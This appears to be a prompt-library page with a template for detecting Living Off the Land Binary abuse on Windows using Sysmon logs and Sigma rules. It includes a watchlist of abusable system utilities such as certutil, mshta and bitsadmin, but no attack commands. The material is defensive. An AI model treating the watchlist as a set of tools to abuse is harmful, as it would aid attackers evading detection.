security analyst security skill risk: medium
LOLBAS Abuse Detection with Sigma Rules
The prompt provides an overview, prerequisites, and six-step procedure for detecting abuse of Living Off the Land Binaries using Sysmon process telemetry, Windows Event Logs, and S…
- Policy sensitive
- Human review
SKILL 4 files · 2 folders
SKILL.md
--- name: detecting-living-off-the-land-with-lolbas description: "Detect Living Off the Land Binaries (LOLBins/LOLBAS) abuse including certutil, regsvr32, mshta, and rundll32" --- # Detecting Living Off the Land with LOLBAS ## Overview Living Off the Land Binaries, Scripts, and Libraries (LOLBAS) are legitimate system utilities abused by attackers to execute malicious actions while evading detection. This skill covers detecting abuse of certutil.exe, regsvr32.exe, mshta.exe, rundll32.exe, msbuild.exe, and other LOLBins using process telemetry from Sysmon and Windows Event Logs, combined with Sigma rule-based detection. ## When to Use - When investigating security incidents that require detecting living off the land with lolbas - When building detection rules or threat hunting queries for this domain - When SOC analysts need structured procedures for this analysis type - When validating security monitoring coverage for related attack techniques ## Prerequisites - Sysmon or Windows Security Event Log (Event ID 4688) with command-line logging enabled - Sigma rule conversion tool (sigmac or sigma-cli) - SIEM platform (Splunk, Elastic, or similar) for log ingestion - Python 3.8+ with pySigma library - LOLBAS project reference database ## Steps 1. **Establish LOLBin Watchlist** — Build a prioritized list of monitored binaries (certutil, mshta, regsvr32, rundll32, msbuild, installutil, cmstp, wmic, bitsadmin) 2. **Collect Process Telemetry** — Ingest Sysmon Event ID 1 (Process Create) and Windows 4688 events with full command-line capture 3. **Build Sigma Detection Rules** — Create Sigma rules matching suspicious command-line arguments, network activity, and parent-child process anomalies for each LOLBin 4. **Analyze Parent-Child Relationships** — Flag unexpected parent processes spawning LOLBins (e.g., Excel spawning certutil, Word spawning mshta) 5. **Score and Prioritize Alerts** — Apply risk scoring based on argument anomaly, parent process, execution path, and network indicators 6. **Generate Detection Report** — Produce a structured report of all LOLBin abuse detections with MITRE ATT&CK mapping ## Expected Output - JSON report listing detected LOLBin abuse events with severity scores - MITRE ATT&CK technique mapping for each detection (T1218, T1105, T1140, T1127) - Parent-child process anomaly analysis - Sigma rule match details with raw event data
REQUIRED CONTEXT
- Sysmon or Windows Security Event Log (Event ID 4688) with command-line logging
- Sigma rule conversion tool
- SIEM platform
- Python 3.8+ with pySigma
- LOLBAS project reference database
TOOLS REQUIRED
- sigma_rule_conversion
- siem_query
EXPECTED OUTPUT
- Format
- structured_report
- Schema
- json · detected LOLBin abuse events with severity scores, MITRE ATT&CK technique mapping for each detection, Parent-child process anomaly analysis, Sigma rule match details with raw event data
- Constraints
- JSON report with severity scores
- include MITRE ATT&CK mapping
- include parent-child process anomaly analysis
- include Sigma rule match details with raw event data
CAVEATS
- Dependencies
- Sysmon or Windows Security Event Log (Event ID 4688) with command-line logging enabled
- Sigma rule conversion tool (sigmac or sigma-cli)
- SIEM platform (Splunk, Elastic, or similar) for log ingestion
- Python 3.8+ with pySigma library
- LOLBAS project reference database
- Missing context
- Target SIEM platform configuration details
- Desired output length or depth
QUALITY
- OVERALL
- 0.78
- CLARITY
- 0.90
- SPECIFICITY
- 0.75
- REUSABILITY
- 0.70
- COMPLETENESS
- 0.80
IMPROVEMENT SUGGESTIONS
- Add explicit placeholders for LOLBin list and MITRE mappings so the template can be reused for other technique families
- Specify required fields and schema for the JSON report to improve consistency
USAGE
Copy the prompt above and paste it into your AI of choice — Claude, ChatGPT, Gemini, or anywhere else you're working. Replace any placeholder sections with your own context, then ask for the output.
MORE FOR SECURITY ANALYST
- Ransomware Network Indicators Analyzersecurity analystsecurity
- APT TTP Mapping with MITRE Navigatorsecurity analystsecurity
- Linux Persistence Mechanisms Analyzersecurity analystsecurity
- Azure AD Lateral Movement KQL Detectorsecurity analystsecurity
- Kerberos Golden Ticket Forgery Detectorsecurity analystsecurity
- Shadow IT Cloud Usage Detectorsecurity analystsecurity
- Registry Run Key Persistence Detection Guidesecurity analystsecurity
- Detect Risky OAuth Consent Grants in Entra IDsecurity analystsecurity
- Windows Service Installation Threat Huntersecurity analystsecurity
- Web Server Log Intrusion Analyzersecurity analystsecurity
- RDP Brute Force Event Log Analyzersecurity analystsecurity
- Rekall Memory Forensics Artifact Extractorsecurity analystsecurity
- Azure Activity Logs Threat Analyzersecurity analystsecurity
- Scapy Network Packet Analysis Guidesecurity analystsecurity
- TLS Certificate Transparency Log Analyzersecurity analystsecurity
- Cobalt Strike Malleable C2 Profile Analyzersecurity analystsecurity
- Email Account Compromise Detection Proceduressecurity analystsecurity
- Credential Stuffing Auth Log Analyzersecurity analystsecurity
- MISP Threat Intelligence Sharing with PyMISPsecurity analystsecurity
- MISP Threat Landscape Analysis Guidesecurity analystsecurity
- Malicious Scheduled Task Sysmon Detectorsecurity analystsecurity
- Kerberos Pass-the-Ticket Attack Detectorsecurity analystsecurity
- NTLM Relay Attack Event Log Analyzersecurity analystsecurity
- Linux Memory Forensics with LiME and Volatilitysecurity analystsecurity
- Insider Data Exfiltration DLP Analyzersecurity analystsecurity